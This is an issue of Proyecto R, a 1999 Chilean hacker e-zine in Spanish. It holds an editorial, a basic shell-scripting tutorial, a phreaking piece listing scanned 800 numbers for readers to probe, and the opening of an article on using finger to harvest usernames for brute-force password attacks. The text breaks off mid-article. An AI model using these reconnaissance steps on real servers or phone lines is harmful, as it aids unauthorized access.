OYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECT
YECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYEC                 O
ECTO~         ~YECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYE                   P
CTOP  osecmc+e. YTOPROYECTOPROYECTOPROYECTOPROYECTOPROY                     R
TOPR  M$$dbGq$$L YPROYECTOPROYECTOPROYECTOPROYECTOPRO      << PROYECTO R >> O
OPRO  WTQ   ~Q$$  ROYECTOPROYECTOPROYECTOPROYECTOPR                         Y
PROY  RN$    $$*  OYECTOPROYECTOPROYECTOPROYECTOP        EL PRIMER MAGAZINE E
ROYE  !@$  .dR$! dYECTOPROYECTOPROYECTOPROYECTO                 ELECTRONICO C
OYEC  $$$ojuW@# dYECTOPROYECTOPROYECTOPROYECT                       CHILENO T
YECT  $TRne?$$  YECTOPROYECTOPROYECTOPROYEC                                 O
ECTO  $WR  4$$L YCTOPROYECTOPROYECTOPROYE         LA COPIA INFELIZ DEL EDEN P
CTOC  $$R   RTN  YOPROYECTOPROYECTOPROY                                     R
TOPR  $$R   `M$:  YROYECTOPROYECTOPRO                               E-MAIL: O
OPRO  $EN    M$W:  YYECTOPROYECTOPR                  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  Y
PRP .+***@.  `*!Rp.  ~YOPROYECTOP                                           E
ROb.          .*``W@~. YROYECTO                                        URL: C
OYECTOPROYEb.         .dOYECT                           http://www.cdlr.org T
YECTOPROYECTOPROYECTOPROYEC              http://www.bigfoot.com/~proyecto_r O
E                          http://www.geocities.com/colosseum/sideline/9497 P
C                                                                           R
T                                                                           O
OPROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROY

                                    A~O 1
                                   NUMERO 7
                             Septiembre 3 DE 1999

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

                                   DISCLAIMER

      Toda la informacion aqui contenida se publica unicamente con fines
  educativos, el mal uso de la misma no sera en ningun caso responsabilidad
   del editor ni de alguno de los miembros del staff, en algunos casos esa
    misma informacion es solo un modo de diversion, ya que lo que aqui se
                     expone puede ser totalmente falso 

    Aunque poner en practica algunas de las cosas aqui publicada puede ser
      ilegal, en ningun momento pretendemos inducir a la ilegalidad con
                                lo aqui expuesto.

     Los acentos y caracteres especiales han sido eliminados para evitar
              problemas de compatibilidad con algunos sistemas
            Usea, no es que seamos cerraos para la ortografia ;)

                         Editor Recomendado Edit del DOS
                         En otros no se ve del todo bien

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


       ..Staff Oficial:..

       ..AndyK..         
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
       ..Taker..         
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
       ..ToniK..         
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
       ..PlaXiuS..       
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
       ..ArcangNet..     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
       ..Mate Swichman.. 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

       ..Editor en este Numero:.

       ..Taker..         
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   (Otra vez yo...!!!)

       ..Colaboradores..

       ..Chack..
       ..TeeSPy..
       ..Glymar..
       ..Supreme..
       ..Mr.Nexus..
       ..Death_bot..
       ..Mr. Silence..
       ..Violet Moon..
       ..Don Cucumber..

       ..Agradecimientos:..

       SET                 http://www.imedia.es/set
       RaregaZz            http://raregazz.acapulco.uagro.mx
       JJF/Hackers Team    http://www.jjf.org
       Raza-Mexicana       http://www.raza-mexicana.org
       DarkCl              
       HVen                http://www.hven.org
       Zine Store          http://surf.to/zs
       InET                http://intrusos.cjb.net

       Y a todos aquellos que gusteles o no, nos tienen que aguantar.
       hmmm...


       ..Lamer de Esta edicion:..

       Parece   que  la  gente  no deja  de dar papaya en el IRC, esta vez se
       gano el  puesto, alguien  que es un  Super  Hacker 313373, creo que es
       el mejor Hacker que ha existido en todos los tiempos...

       Si  no  me creen,  juzguenlo  ustedes...(pero  primero adivinen quien
       Pacman fue..??) XDDDD

        uds son una verguenza
        solo por chuparsela al editor
        de esa revista lama
       <}^PunkY^{> yo no soy hacker hacker es muy amplio me falta aun por
                   ke no le e dedikado todo mi time
        que es proyecto R
         solo por chuparsela al editor
         de esa revista lama
        Proyecto R es una verguenza
        jajajaja
       <}^PunkY^{> revista lama la del plaxius???
        jajaja
        plaxius lamah jajajaja
       <}^PunkY^{> shuaaaaaaaaaaaa
       <}^PunkY^{> ahora tiraste abajo el pokito de respeto ke te tenia
        puta es cosa de ver la pagina
        y los ahueonaos qu escriben
       <}^PunkY^{> no hablo mas kon weones
        que hacker tiene que leer
        o aprender
        esa huea que esta en geocities
        jajajaja
        actualizate weon
        www.cdlr.org
        jajajajaja
        igual ke tenemos dominio y servidor y vo no :9
        cacha el fuego po
        penosa la pagina
        teni dominio????
        yo me consigo los dominios gratis
        que tenis que andar haciendo paginas
        jajajajaja
        y ezines



      Parece que es otro caso de  esos  que nacieron aprendidos, bueno que se
      se  le  va  a  hacer, esperemos  que  escriba  un articulo supertecnico 
      para el proximo Numero.




      SOPORTE 911 #########################


     Usuario : Alo soporte , necesito que me ayuden
     Soporte : Bueno digame cual es el problema ...
     Usuario : Es   que  estoy  instalando  un  programa  y me  dice que debo
               cerrar todas la sventanas para poder hacer la instalacion.
     Soporte : Entonces hagalo , no cree (hay dios cada usuario en la vida)
     Usuario : OK
		
     Dos horas, cinco minutos y 23 segundos mas tarde !!!

     Usuario : alo helpdesk
     Soporte : si digame !!
     Usuario : bueno le llame hace un rato atras sobre  una instalacion que
               me decia que cerrara las ventanas , se acuerda ?
     Soporte : A sip  verdad !! pero que pasa !!
     Usuario : LO QUE  PASA  ES  QUE  CERRE  TODAS  LAS VENTANAS E INCLUSO LA 
               PUERTA, PERO AUN NO PUEDO INSTALAR LA APLICACION !!! 
               QUE SERA .,,, Y ESO QUE SOY UN BALAZO PA LA COMPUTACION !!

      Plop....!!!!


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


                                  CONTENIDOS

     01.  Editorial .........................................   Editor
     02.  Phreaking en Chile ................................   AndyK
     03.  Programacion en Shell .............................   TeeSPy
     04.  Entendiendo Tecnicas Hacking ......................   PlaXiuS
     05.  Trucos Varios  ....................................   Jiuster
     06.  Identificar y ocultar identidad en el Email .......   CHack
     07.  Hacking en Linux 4.X ..............................   Madjester
     08.  La embarre...??? o es que me parece................   Taker
     09.  Como ponerle passwords a las paginas web...........   Don Cucumber
     10.  Condon por irc a travez del mirc ..................   Magis
     11.  Programando en Linux ..............................   AndyK
     12.  Scripts de Inicio en Linux ........................   Taker
     13.  Historia de un cr/hackeo mas! .....................   ToniK
     14.  Noticias del Mundo del Espectaculo ................   Mate y TnK
     15.  Curso Linux .......................................   TeeSPy
     16.  Servidor de Acceso Remoto en NT ...................   Gengis_KAN
     17.  Como hackear servidores NT a traves de Internet ...   PlaXIuS
     18.  Como Conectarse Con Linux a Internet ..............   CrackX
     19.  Ha llegado Mail ...................................   CDLR
     20.  Chistes Cuentos y Otras Burradas ..................   Varios
     21.  Shutdown ..........................................   Editor
     22.  Llaves PGP ........................................   CDLR

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


01. _______________________________________________________________ Editorial
                                                                    By Editor

Cuando se  daran  cuenta  que Hackear  no significa tirar abajo un server, ni
tampoco es  modificar  una  pagina  donde  escribes  mensajes  en  contra del
gobierno, o en contra de aquel  HP que te cae mal. Cuando dejaran de hecharle
la  culpa  a  los  Hackers  por  los  sistemas  que  se  caen (aunque algunos
ultimamente  han optado por hecharle la culpa a las tormentas electricas. *No
voy  a decir quien, Uds. ya deben saberlo*). Cuando  se daran cuenta que este
mundo  de  cables  y  silicio  fue  creado,  es mantenido y sera mejorado por
Hackers. He ahi la pregunta.

Tal vez  cuando eso pase dejaran de considerarlos delincuentes, pero creo que
todavia queda un gran paso para que eso suceda, ya que mientras no confien en
los  Hackers, los hackers seguiran infiltrandose ilegalmente en sus sistemas, 
y  mientras  ellos (hi Big Bro.;)) tengan datos que esconder, no confiaran en 
los Hackers.

Ya  estamos  aqui, y  con o sin su consentimiento aqui nos quedaremos, porque 
sabemos mas que ustedes, porque adoramos este mundo, porque queremos que este
mundo si sea libre, queremos que sea mejor que el mundo de afuera.

Bueno,  ya  heche mi rollo, en este numero se ha crecido un poco, por que..?? 
pues  nos  hemos puesto las pilas y aunque a veces el tiempo nos queda corto, 
tratamos  de  aportar  nuestro  mejor esfuerzo para dar a ustedes mas y mejor 
informacion.

Esta  edicion  esta cargada de Linux, NT, y ademas tenemos una entrevista con 
el  Conde  Vampiro  (wouooppss,  no,  eso  fue  en  SET  20, a proposito esta 
excelente).

Bueno,  ahora  si  hablando  en  serio,  se habran dado cuenta que ya tenemos 
servidor  y  dominio  propios,  pues  si, como  lo  veniamos  diciendo  desde 
unos  cuantos  numeros  atras,  por fin  llego  el  momento  de  inaugurarlo,
puede que aun le falten muchas cosas,  pero  en eso estamos trabajando, y asi 
como siempre tambien necesitamos de su apoyo,  que  nos  digan  que cosas les
gustaria que incluyeramos, que no les gusta...etc.

Tambien  a  partir  del  proximo  numero  incluiremos  una  seccion de phreak 
chileno,  que  estara  a  cargo  de  Nykhro-Damage, la  idea de la seccion es 
que  ustedes  envien  las  dudas  via e-mail  y  el se encargara de responder
por  el  momento  mientras  se  crea la cuenta de correo  pueden  enviar  sus
dudas  a  mi e-mail  (
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 )  con  el  subject  phreak,  yo  me 
encargare  de  hacerlas   llegar  a  su  destino.  Esta  seccion  se  llamara 
Nykhro-Damage Responde.
Ademas, en phreak tambien tenemos a MoonSpell... ;)

Como  he  recibido e-mails diciendo que escribo unas editoriales muy largas y 
que  mucho  rollo, y  que  yonoseque y  yonosecuando, pues aqui la termino, y 
disfruten este numero.

Plop.

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


02. ______________________________________________________ Phreaking en Chile 
                                                           By AndyK

El  phreaking  en  chile esta surgiendo muy fuerte.... pero en realidad yo me
pregunto: Va por buen camino?

Primero  que  nada  kiero  dar a conocer ke la famosa blackbox de la ke tanto
hablan en irc  y  ke  esta  publicada  en  muchas  paginas  web de "phreakers
chilenos"  no  sirve  para  llamar  gratis. En  las  centrales  antiguas (las
analogas) la blackbox hacia lo siguiente...

- Si  tu  conectabas  una blackbox a tu linea telefonica y alguien te llamaba
tu  podrias  hablar  con  esa  persona  sin ke a ella le cobraran, osea na ke
ver con ke tu llames gratis...

esto  se  producia  debido  a  ke  las tarifadoras comenzaban a correr cuando
la  corriente  sobrepasaba  un  valor  determinado (al contestar la llamada),
y  la  resistencia de la blackbox mantenia un valor determinado de corriente,
osea la central no se daba ni cuenta ke nosotros habiamos descolgado......

Tambien  hay centrales ke en ves de verificar la corriente verifican el nivel
de voltage. Y fue por eso ke salieron a la luz las blackbox ke usaba un diodo
zener (componente electronico ke regula el voltage, osea lo mantiene).

Como  ya  pueden  ver  en  ninguno de los casos la blackbox sirve para llamar
gratis..

Bueno  pasando  a  otra  area  del phreak he estado escaneando las lineas 800
con  algunos   amigos  ( Charles, DarkBlue...  gracias  muchachos)  y  me  he
encontrado  con  varias  sorpresas....  solamente  les  dare  algunos numeros
para ke vean lo ke se puede llegar a encontrar en este espectro.


		800200078 
		800200079 
		800200044 
		800200046 
		800200141 
		800200199
		800200117
		800200183
		800200259 
		800200214 
		800200295 
		800200227
		800200243
		800200275
		800200346
		800200378 
		800200315
		800200343 
		800200353
		800200357
		800200400
		800200475
		800200438
		800200439
		800200480
		800200497 
		800200515
		800200575
		

Bueno  espero  ke  saken  algun  provecho  de estos numeros.... y los animo a
investigar...  uno  nunca  sabe  lo  ke  pueda llegar a encontrar... Hasta la 
proxima y buena suerte.

AnDyK

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

03. ___________________________________________________ Programacion en Shell 
                                                        By TeeSPy

Programando con Shell

By:     TeeSPy
Mail:   
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   <<-- Aki comentarios o dudas..(YAA!!, ta 
                                     bien, madrazos y chuchadas tambien aki)


Buino, aki tamos haciendo mi primer texto de Linux.

Ojala  les  guste,  ahh!!!,  y  sorry por el lenguaje formal... xD. Cuando lo 
hice, pense  ke asi seria mejor,  pero me arrepiento totalmente... Lo malo ke 
ni alli con reeditarlo.

Si  encuentran  algun  error,  son  libres  de corregirlo (ver copyright), de 
hecho, ojala  lo hagan p ke debe estar lleno de ellos. Eso si, agradeceria me 
avisasen si modifican algo.

Humm, mejor no sigo hablando o se aburren aki mesmo, asi ke, aki va.


COPYRIGHT:

Este  texto  puede  ser  reproducido  por  cualquier  medio,  ya sea impreso, 
copiado, distribuido a traves de Internet, etc. Siempre y cuando se deje esta 
nota de copyright al principio y se haga mencion al autor (TeeSPy).

Tambien  se  permite  hacer  modificaciones  a  este, siempre y cuando en los 
nuevos documentos se deje esta nota de copyright.


NOTA: Se preguntaran:  p  ke  pongo  Copyright  en un simple articulo para un 
      e-zine??

     Bueno, es  por  ke este simple articulo lo planeo hacer algo mas grande, 
     no se cuando,  pero  nunca  hay  ke  perder  la ezperanza no?? asi ke me 
     aseguro ke no me lo kiten.


			
0- Introduccion???

En  el  siguiente  texto,  se  introduce  a  como  poder  programar  archivos 
ejecutables para las shells de Linux.

Esta  actividad,  se  podria  llegar  a comparar con la programacion archivos 
Batch del DOS, ya que estos, a igual  que  los  de  Linux,  se  centran en la 
llamada  de   comandos   del   sistema  para  funcionar,  mas  otras  cuantas 
funcionalidades claro esta, como el uso de variables, que son estructuras que 
en un momento dado, tienen asignado para si uno de muchos valores posibles, y 
el uso de estructuras de control, que  especifican  la forma en que uno puede 
controlar  el  flujo de ejecucion de un script (de ahora en adelante, en este 
texto se le dara  el  nombre  de  "script"  al archivo ejecutable que estamos 
programando)  y  por ende hacen mas flexible la programacion. Existen 2 tipos 
basicos de estructuras  de control, que son las estructuras de decision (como 
las como if... then... else...  o  las  case)  y las estructuras iterativas o
ciclos (como un ciclo for o while).  Con  una  estructura  de decision, usted  
elige  un  curso  de  accion  de  una o mas alternativas y con una estructura 
iterativa, usted repite una secuencia  de  comandos.  Ademas de esto, para la 
programacion  de  scripts  existen  otras  posibilidades  especiales  para el 
programa que sirven para facilitar  el manejo de este y dar mas posibilidades 
al  programador.  Algunas  de  estas posibilidades son el uso de comentarios, 
comandos especiales, como el comando echo, y ademas, los comandos comodin.

Por  otra  parte,  para  hacer  nuestros  scripts, podemos utilizar cualquier 
editor  ke  nos  produzca t exto  ASCI (a mi me gusta el joe), y luego con un 
chmod +x  lo dejamos listo para la ejecucion.

Y por ultimo, destacar ke yo PARA NADA soy un guru en esto de la programacion
en shell, asi ke sean benevolentes a la hora de la critica.


1- Uso de echo:

Se  utiliza  el  comando  echo  para  desplegar  mensajes informativos que se 
quieran  comunicar,  los  cuales  pueden  ser  mostrados en la terminal o ser 
direccionados  a  un  archivo. echo  despliega  sus argumentos, o sea, lo que 
sigue  de  la palabra echo en el script. Los argumentos  de  echo,  deben  ir 
encerrados entre comillas ("argumentos") para que se muestre todo el texto.

        echo "Por favor, ingrese su opcion..."

La linea de arriba, muestra:
        "Por favor, ingrese su opcion..."  en la terminal

        echo "Por favor, ingrese su opcion... > msg

Esta  otra  linea, coloca:

        "Por favor, ingrese su opcion..." en el archivo  msg  del  directorio
        actual

Es muy conveniente usar el comando echo para nuestros scripts, ya que si, por 
ejemplo, nuestro  script  hace una operacion muy larga, el usuario creera que 
esta se ha detenido o ha  tenido un error, y podria terminarlo por esa razon.

En  cambio, si  para la misma operacion anterior, se hubiera puesto echo "Por 
favor, espere unos minutos", el usuario sabria que ese comando va ha demorar, 
y por lo tanto, lo  dejaria  correr sin problemas. El empleo de echo, tambien 
permite saber que esta pasando en el script. Ahora se presenta un ejemplo del 
empleo de echo, en un archivo que se va ha llamar "stat":

	 echo "humm, veamos que tenemos que hacer hoy..."
	 calendar
	 date
	 echo "quien esta en el sistema?"
	 who
	 echo "***Listooo!!  operacion terminada"

En este ejemplo, el script ejecuta el comando calendar y date, previo a haber 
informado al usuario de lo que se proponia, y luego le dice al usuario que va 
a ver quien esta en el sistema, para lo que emplea who.


2- Uso de comentarios:

Bueno, si estan relacionados con la programacion, sabran a que me refiero con
los  comentarios. Si no es asi, les explico que los comentarios son una forma
de poner frases, ya sea recordatorias, explicativas o de cualquier tipo en el
codigo,  para que luego de algun tiempo sin ver el codigo del script, podamos
recordar cual es la funcion de este o de como lo hicimos. Los comentarios son
ignorados  por el shell, el cual solo pasa de largo cuando se topa con uno de
ellos.

Para introducir comentarios en el codigo, basta con poner el signo # antes de
este. Cada caracter  a  partir  de  ese  signo hasta el final de la linea, es
considerado como comentario.

A continuacion, un ejemplo del archivo "stat" con comentarios:
	 
	 # Nombre de archivo: stat
	 # la siguiente linea, muestra las citas y la fecha actuales
	 echo "humm, veamos que tenemos que hacer hoy..."
	 calendar
	 date
	 # la siguiente parte, muestra quien esta en el sistema
	 echo "quien esta en el sistema?"
	 who
	 echo "***Listooo!!  operacion terminada"

Cabe  decir  que no hay que confundir el comando echo con los comentarios, ya
que la salida  de echo, se muestra en la terminal, pero los comentarios, solo
se ignoran, o sea  que  el archivo stat sin comentarios, funciona exactamente
igual que el que si los tiene.

Otra  cosa  importante,  es  decir  que  en  estos 2 comandos, reconocen como 
argumentos  solo  lo  que esta en la linea que les  sigue.  Por  ejemplo,  el
siguiente  archivo  stat  produce  un  error,  ya  que  la  segunda  linea de
comentario, no tiene el signo #

	 # Nombre de archivo: stat
		 Fecha: xx/xx/xx  # la linea de fecha produce error
	 # la siguiente linea, muestra las citas y la fecha actuales
	 echo "humm, veamos que tenemos que hacer hoy..."
	 calendar
	 date
	 # la siguiente parte, muestra quien esta en el sistema
	 echo "quien esta en el sistema?"
	 who
	 echo "***Listooo!!  operacion terminada"


3- Programacion con variables:

Para  poder usar variables, se necesita saber como asignarles un valor y como
accesar el valor asignado.

Hay cuatro formas de asignar un valor a una variable:

		**Mediante una asignacion directa
		**Con el comande read
		**Por medio de los parametros de la linea de comandos
		**Por la sustitucion de la salida de un comando


3.1- Uso de la asignacion directa:

La forma mas directa de asignar a una variable un valor, es hacerlo por medio
de una expresion como:

		miprocesador=Pentuim_Pro

Esa  expresion,  le  asigna  a  la  variable llamada miprocesador el valor de
Pentium_Pro. No se deben incluir  espacios  en  ninguno de los 2 extremos del
signo igual (=). Este metodo, se puede resumir de la siguiente manera:

		NombreVariable=ValorVariable

Si  ValorVariable  contiene  espacios,  encierre  el valor entre comillas, al
igual que se hace en el siguiente ejemplo:

		mimemoria="128 MB SDRAM"

Para recuperar el valor de una variable, se debe  poner  un  signo de dolares 
seguido del nombre de la variable. A continuacion, un ejemplo  de un programa
que recupera las 2 variables que declaramos anteriormente:

	echo "Mi  procesador es un $miprocesador"
	echo "Mi memoria es de $mimemoria"

El ejemplo anterior, despliega lo siguiente en la terminal:

	Mi procesador es un Pentium_Pro
	Mi memoria es de 128 MB SDRAM

Claro  esta,  que  el  uso  de las variables con el comando echo es  solo  un
peque~o ejemplo de lo que se  puede  hacer  con ellas. Supongamos por ejemplo
que   usted   mueve   con   frecuencia   archivos  a  un  directorio  llamado
/srt/trabajos/tomas/. Para mover este archivo usted pone:

	mv ./archivo /srt/trabajos/tomas/

Para  hacer  esto  aun mas facil, puede asignar el nombre del directorio a la
variable midirectorio con lo siguiente:

	midirectorio=/srt/trabajos/tomas/

Ahora, para mover el archivo, usted tendra que poner:

	mv ./archivo $midirectorio

Lo  que hace el shell, es sustituir la variable midirectorio con el valor que 
tiene asignado, y luego mueve el archivo.


3.2- Uso del comando read:

Este comando toma la siguiente entrada de teclado y la asigna a una variable.

El  siguiente script hace lo mismo que el anterior, solo que ahora le pide al
usuario  el  nombre del archivo a copiar. El comando read, hace que el script
se detenga y espere  la  siguiente  entrada  de teclado. Si oprime  el
script continua y si presiona  mientras  read  estaba  esperando,  se
termina el script.

	 # Nombre: Movearch
	 # Fecha: **/**/**
		 midirectorio=/srt/trabajos/tomas/
		 echo "Nombre de archivo para mover?" # Pide nombre de archivo
		 read nombrearchivo                   # Lee el nombre de archivo
		 mv $nombrearchivo $midirectorio      # Copia el archivo


3.3- Uso de los parametros de la linea de comandos:

Cuando  el  shell  interpreta  un comando, adjunta nombres de variable a cada
argumento  de la linea de comando.  Los  argumentos  de la linea de comandos,
son  las  secuencia de caracteres separados por espacios en  blanco  (se usan
comillas  para  se~alar  al  shell  que  una serie de caracteres con espacios
forman parte de una misma cadena). Las  variables  agregadas  en  la linea de
comando  se  llaman  {jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]},  jumi,  [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt].. y  asi hasta llegar al numero 9. Estas 10
variables corresponden a las posiciones de los argumentos de la linea, siendo
el {jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]} el nombre del comando, el jumi  el  primer  argumento, el [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt] el segundo y
asi sucesivamente. Como ejemplo de esto, vea el siguiente script ejemplo:

	# Nombre: movedel
	# Fecha: **/**/**
		cp jumi /trash   # Copia el archivo al directorio /trash
		rm jumi          # Elimina el archivo

Ahora se escribe movedel archivo1 y presiona  (despues de haberle dado
permiso  de ejecucion al archivo, para que se convierta en ejecutable) y este
archivo se  copia  a  /trash  y  luego  se  elimina, pero si Ud. pone movedel
archivo1 archivo2, el script solo se ejecuta  con  archivo 1, ya que usted le
indico que solo actuara con el argumento jumi. Para solucionar  esto, se  puede
sustituir  en  el  script de ejemplo el jumi por $*, que representa a todos los
argumentos de la linea  de  comandos  en  uno solo. Ahora, si escribe movedel
archivo1 archivo2, el script actuara con ambos.


3.4 Uso de la substitucion de la salida de un comando:

Para  poder  asignar  el  valor  de  un  comando a una variable (Por ejemplo,
asignar el valor del comando pwd, que  muestra  el  directorio  actual  a una
variable) se debe poner el comando entre acentos graves (`comando`).

Considere el siguiente ejemplo de un script que asigna el valor del comando
pwd a una variable llamada diractual:

        diractual=`pwd`

Este otro ejemplo, imprime una lista de los logs mas recientes al sistema:

	# Nombre: printlog
	# Fecha: **/**/**
		log=`last`
		cp $log ./printlogfile
		echo "***Procediendo a imprimir***"
		lpr ./printlogfile
		rm ./printlogfile

En este ejemplo,  se  asigna  a  la  variable  log el valor del resultado del
comando  last,  despues  se  copia  la  variable  log a  un  archivo  llamado
./printlogfile, y luego lo imprime, finalizando con borrar el archivo creado.


4- Uso de caracteres especiales en programas de shell:

Bueno,  sabemos  que hay caracteres como $, *, > a los cuales el shell da una
funcion especial.  Pero,  que pasaria si usted quiere utilizar estos comandos
pero  no  quiere  que reciban  trato  especial?.  Bueno,  a  continuacion  le
ofrecemos una solucion para estos casos.

Una alternativa, es usar apostrofos ('') para hacer que el shell ignore estos
caracteres  especiales.  Para  hacer  esto,  tiene  que poner la cadena entre
apostrofos, como se ve en el siguiente ejemplo.

        Grep '^Jose Fuentes' invitados

El ejemplo anterior, hace que se busque la cadena ^Jose Fuentes en el archivo
invitados.  Si  no  se hubieran puesto los apostrofos, el shell quiza hubiera 
tomado el signo ^ de  forma  literal,  o  como  simbolo de tuberia en algunos
sistemas. El espacio entre Jose y Fuentes no es  interpretado  por  el  shell
cuando ocurre entre apostrofes.

Tambien  se pueden utilizar las comillas ("") para hacer que el shell no tome
en cuenta  la  mayoria  de  los  caracteres especiales, a exepcion del acento
grave(`) y el signo de dolares ($).  En  el ejemplo que viene a continuacion,
los  asteriscos  (*) el signo mayor (>) y los  espacios,  son  tratados  como
caracteres normales por el shell, ya que van entre comillas.

        echo "***Estos caracteres son tratados como normales >> XD"

Pero,  al  contrario,  en  este otro ejemplo, el caracter $ no es tomado como
normal,  en  cambio,  se  introduce  el  valor  de  la  variable  cuando se
despliega la cadena.


	echo "Son  la pizza, se~or"


Aqui,  en  lugar  de  la cadena , se despliega el valor que tiene conferido 
esta, pero no se despliega de forma literal como nos proponiamos.

Para  solucionar el problema anterior, se usa el signo \ antes del caracter o 
la cadena  de  caracteres  que  deseemos poner.  Se  puede  utilizar el signo 
backslash (\) para hacer que el shell ignore los signos especiales.

EOF

Bueno, hasta aki en esta primera parte...

En  la  segunda,  vamos  a  ver  la  parte  de  programacion con control (los 
conocidos  if-then-else-fi,  los  while  y  todas  esas  cositas  ke hacen de 
programar scripts algo interesante).

Ojala  les  haya  gustado, y espero tener lista la segunda parte del cursillo 
para el proximo  numero  del e-zine (Ultimamente me han estado acribillando a 
pruebas).

Hasta la proxima entonces, y ke la fuerza los acompa~e.

           <<<<<<<<<<<<<<<<<<<<---TeeSPy--->>>>>>>>>>>>>>>>>>>>>>>

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

04. ____________________________________________ Entendiendo Tecnicas Hacking 
                                                 By PlaXiuS

Holass!!
Yo nuevamente,  en este articulo tratare de explicar algunas tecnicas hacking
mas conocidas pero que  normalmente  los  newbies desconocen. Muchas veces se
habla sobre hacer hijacking o spoffing y mucha gente queda con la duda de que
podria ser. Asi que trate de recopilar la mayor  informacion  de  como operan
estas tecnicas para graficarlas y explicarlas en estas letras, espero  que lo
disfruten.

Bueno  a medida que avanza la tecnologia y aumenta por cierto la seguridad de
los sistemas, los hackers han tenido que inventar nuevas tecnicas para saltar
las barreras  que  se  ponen  para  llegar  a su  objetivo.  Es asi que se ha
avanzado desde el simple finger a una maquina para intentar entrar  a  fuerza
bruta, algunas tecnicas mas noveles como seria el  hijacking.  Pero  partamos
por el principio (ni duda no).


Finger
======

Si  sep, esto  es muy basico pero es necesario explicarlo para los newbies no
creen, ademas nadie nacio sabiendo.

Bueno el servicio  finger,  es  original  de  UNIX y su  objetivo es entregar
informacion sobre las conexiones a su servicio. El funcionamiento  de  finger
se  basa  en mostrarnos informacion sobre los usarios conectados a un sistema
unix e incluso  revisar  a algun usario en especial, para saber cuando fue la
ultima vez que se conecto, desde que estacion , etc...

El problema de este servicio  es  que ha sido aprovechado por hackers durante
varios a¤os (hasta el dia de hoy) ya que  el resultado de un finger nos puede
mostrar los nombres de usuario y ademas otra informacion relevante como seria
el verdadero nombre de usuario, telefono,  etc... informacion  que sirve para
intentar  conectarse  por medio de fuerza bruta a un server (probar  password
hasta encontrarlo). Como  funciona finger??? pues  muy simple, desde tu shell
pones :


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 $finger @server.com


O  tambien  puedes  hacer un telnet al puerto 79 del server funciona igual el
problema es que si tiene  muchos  users  conectados,  nos  mostrara  la lista
demasiado  rapido  y  no  podremos  percibir  el  resultado. Entonces podemos
guardar el resultado en un archivo de texto , ej:


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 $telnet www.server.com > finger.txt

Y listo , ahora  si estas desde win2 mmm tambien se puede, haciendo un telnet
al puerto 79, el problema  que  una  vez  hecho  el telnet tendras que dar un
enter para que aparezca la lista rapidamente y luego  te desconectara mmm una
pena si son muchos usarios tampoco podras ver los detalles  pero  si  guardas
el log del telnet (se puede por si acaso) lo podras ver con mas calma.

Desde una shell, puedes ver informaciom


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 $finger 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Te mostrara la informacion correspondiente a este personaje .

Es  por  este  problema  que  muchos  administradores  de servidores UNIX han
deshabilitado el servicio finger de sus makinas ya que es una invitacion a un
hacker  a  entrar  en  sus  sistemas,  pero  te  aseguro que aun  hay  muchos
servidores con este servicio funcionando.

Pregunta del Newbie : Pero finger solo funciona para makinas Unix???
R: Bueno sip, y en sus similares como seria Linux. Pero ojo WinNT a traves de
su servicios Netbios nos da mas informacion que lo  que finger  entrega en un
sistema  Unix  (hechenle  una mirada en el articulo de como hackear  Winnt  a
